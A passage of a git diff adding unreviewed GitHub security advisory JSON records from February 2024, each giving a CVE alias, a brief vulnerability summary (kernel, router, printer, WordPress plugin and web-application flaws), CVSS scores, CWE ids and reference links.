"https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json b/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json new file mode 100644 index 0000000000000..9dddd3f88bf19 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-98fx-x879-qp6f", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-6356" + ], + "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6356" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6356" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json b/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json new file mode 100644 index 0000000000000..ce2f713da6546 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-996q-vfw9-5cfp", + "modified": "2024-02-08T06:30:23Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47567" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47567" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json b/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json new file mode 100644 index 0000000000000..1f4e389af3788 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-997r-3g6v-ph4j", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-43517" + ], + "details": "Memory corruption in Automotive Multimedia due to improper access control in HAB.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43517" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json new file mode 100644 index 0000000000000..b5759064a8cb3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99gp-p4g8-wrh7", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24497" + ], + "details": "SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24497" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Login.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json b/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json new file mode 100644 index 0000000000000..a57f4cd8dffa5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99jr-pjjw-hqmq", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6233" + ], + "details": "Buffer overflow in SLP attribute request process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6233" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json b/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json new file mode 100644 index 0000000000000..3d6b5a92c5daf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99ph-prqq-pm8j", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-24870" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Dempfle Advanced iFrame allows Stored XSS.This issue affects Advanced iFrame: from n/a through 2023.10.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24870" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json b/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json new file mode 100644 index 0000000000000..410738e6e91a8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99rx-9376-xmfc", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-43482" + ], + "details": "A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43482" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1850" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json b/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json new file mode 100644 index 0000000000000..a7800733a6b6d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c5v-wp94-33vx", + "modified": "2024-02-07T15:30:49Z", + "published": "2024-02-07T15:30:49Z", + "aliases": [ + "CVE-2024-25200" + ], + "details": "Espruino 2v20 (commit fcc9ba4) was discovered to contain a Stack Overflow via the jspeFactorFunctionCall at src/jsparse.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25200" + }, + { + "type": "WEB", + "url": "https://github.com/espruino/Espruino/issues/2457" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json b/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json new file mode 100644 index 0000000000000..7ced58943c39a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c8h-crr5-vfcm", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-24524" + ], + "details": "Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24524" + }, + { + "type": "WEB", + "url": "https://github.com/harryrabbit5651/cms/blob/main/1.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T08:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json b/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json new file mode 100644 index 0000000000000..f97300fc137ee --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fc8-v7vw-438w", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-32451" + ], + "details": "\nDell Display Manager application, version 2.1.1.17, contains a vulnerability that low privilege user can execute malicious code during installation and uninstallation\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32451" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000215216/dsa-2023-182-dell" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-272" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json b/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json new file mode 100644 index 0000000000000..dd2913df0ccbe --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fhr-gx36-jrfv", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-22853" + ], + "details": "D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22853" + }, + { + "type": "WEB", + "url": "https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/2/2.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json b/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json new file mode 100644 index 0000000000000..393dc940e3167 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h66-72rx-4cp4", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24836" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audrasjb GDPR Data Request Form allows Stored XSS.This issue affects GDPR Data Request Form: from n/a through 1.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24836" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json b/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json new file mode 100644 index 0000000000000..c1105c7cddb0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hch-g858-cr9j", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47143" + ], + "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 270270.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47143" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270270" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105139" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-116", + "CWE-644" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json b/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json new file mode 100644 index 0000000000000..113caebe40db7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hfp-g5cj-92p6", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2023-48974" + ], + "details": "Cross Site Scripting vulnerability in Axigen WebMail v.10.5.7 and before allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48974" + }, + { + "type": "WEB", + "url": "https://www.axigen.com/mail-server/download/" + }, + { + "type": "WEB", + "url": "https://www.axigen.com/updates/axigen-10.3.3.61" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json b/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json new file mode 100644 index 0000000000000..f8542d80d799c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hq5-xh26-hcx9", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-46344" + ], + "details": "A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46344" + }, + { + "type": "WEB", + "url": "https://github.com/vinnie1717/CVE-2023-46344/blob/main/Solar-Log%20XSS" + }, + { + "type": "WEB", + "url": "http://solar-log.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json b/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json new file mode 100644 index 0000000000000..8e623eb29e148 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9hq7-63hh-f94f/GHSA-9hq7-63hh-f94f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hq7-63hh-f94f", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0701" + ], + "details": "The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0701" + }, + { + "type": "WEB", + "url": "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json b/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json new file mode 100644 index 0000000000000..61114a0c3ed98 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9jg2-gggf-jv4g/GHSA-9jg2-gggf-jv4g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jg2-gggf-jv4g", + "modified": "2024-02-07T03:30:32Z", + "published": "2024-02-07T03:30:32Z", + "aliases": [ + "CVE-2024-1266" + ], + "details": "A vulnerability classified as problematic was found in CodeAstro University Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /st_reg.php of the component Student Registration Form. The manipulation of the argument Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253009 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1266" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253009" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253009" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json b/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json new file mode 100644 index 0000000000000..89664de48387d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9jpc-6xx4-mc82/GHSA-9jpc-6xx4-mc82.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jpc-6xx4-mc82", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24848" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS.This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24848" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json b/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json new file mode 100644 index 0000000000000..deebae5cba541 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9jx4-4hmg-8h59/GHSA-9jx4-4hmg-8h59.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jx4-4hmg-8h59", + "modified": "2024-02-04T21:30:44Z", + "published": "2024-02-04T21:30:44Z", + "aliases": [ + "CVE-2021-46902" + ], + "details": "An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. Path validation is mishandled, and thus an admin can read or delete files in violation of expected access controls.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46902" + }, + { + "type": "WEB", + "url": "https://www.meinberg.de/german/news/meinberg-security-advisory-mbgsa-2021-03-meinberg-lantime-firmware-v7-04-008-und-v6-24-029.htm" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json b/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json new file mode 100644 index 0000000000000..05c49f5b56900 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9mhj-hrp8-v2xc/GHSA-9mhj-hrp8-v2xc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9mhj-hrp8-v2xc", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-23978" + ], + "details": "Heap-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. By processing invalid values, arbitrary code may be executed. Note that the affected products are no longer supported.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": 